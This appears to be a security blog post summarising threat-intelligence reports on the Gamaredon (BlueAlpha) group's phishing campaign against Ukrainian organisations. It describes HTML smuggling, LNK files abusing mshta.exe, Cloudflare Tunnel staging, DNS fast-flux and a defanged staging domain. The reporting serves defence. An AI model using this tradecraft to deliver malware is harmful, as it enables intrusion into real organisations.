Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Visual Basic Script. Show all posts

Hackers Exploit Cloudflare Tunnels and DNS Fast-Flux to Conceal GammaDrop Malware

 A notorious threat actor known as Gamaredon has been observed employing Cloudflare Tunnels to hide its malware staging infrastructure, facilitating the deployment of GammaDrop malware. This technique is part of a spear-phishing campaign actively targeting Ukrainian organizations since early 2024. 

Campaign Details and Tactics 

According to Recorded Future's Insikt Group, the primary goal of this campaign is to deliver Visual Basic Script malware. The group, monitored under the alias BlueAlpha, has also been identified by several other names, including:

  • Aqua Blizzard
  • Armageddon
  • Hive0051
  • Iron Tilden
  • Primitive Bear
  • Shuckworm
  • Trident Ursa
  • UAC-0010
  • UNC530
  • Winterflounder
Active since 2014, BlueAlpha is linked to Russia's Federal Security Service (FSB). "BlueAlpha has recently started using Cloudflare Tunnels to obscure staging infrastructure for GammaDrop, a tactic gaining traction among cybercriminal groups," noted Insikt Group. Additionally, the group continues to use DNS fast-fluxing to complicate the tracking and disruption of command-and-control (C2) communications. 
 
Recent Observations 

The use of Cloudflare Tunnels by Gamaredon was first reported in September 2024 by ESET, a Slovak cybersecurity firm, during attacks targeting Ukraine and NATO countries, including Bulgaria, Latvia, Lithuania, and Poland. ESET described BlueAlpha's methods as "reckless and not particularly stealth-focused," although the group employs measures to evade detection and maintain access to compromised systems. These include deploying multiple simple downloaders or backdoors and frequently updating their malware tools with regularly changing obfuscation techniques. 
 
Malware Deployment Process 

The phishing campaign uses HTML attachments to initiate infections via HTML smuggling. This technique embeds JavaScript code to deliver malicious payloads. Key steps include:
  • Phishing emails with HTML attachments drop a 7-Zip archive ("56-27-11875.rar") containing a malicious LNK file.
  • The LNK file exploits mshta.exe to deliver GammaDrop malware.
  • GammaDrop deploys a custom loader, GammaLoad, which connects to a C2 server to retrieve additional malware.
The GammaDrop malware is staged on a server behind a Cloudflare Tunnel, with the domain amsterdam-sheet-veteran-aka.trycloudflare[.]com serving as a staging point. GammaLoad uses DNS-over-HTTPS (DoH) services like Google and Cloudflare to resolve C2 infrastructure, employing fast-flux DNS methods as a fallback. 
 
Implications and Future Threats 

Recorded Future warns that BlueAlpha is likely to continue refining its evasion techniques by exploiting legitimate services like Cloudflare. This approach complicates detection for traditional security systems. The group's enhancements to HTML smuggling and DNS-based persistence highlight evolving challenges for organizations with limited threat detection capabilities. "Organizations must strengthen their defenses against phishing campaigns and adopt advanced threat detection strategies to mitigate risks posed by actors like BlueAlpha," the report concluded.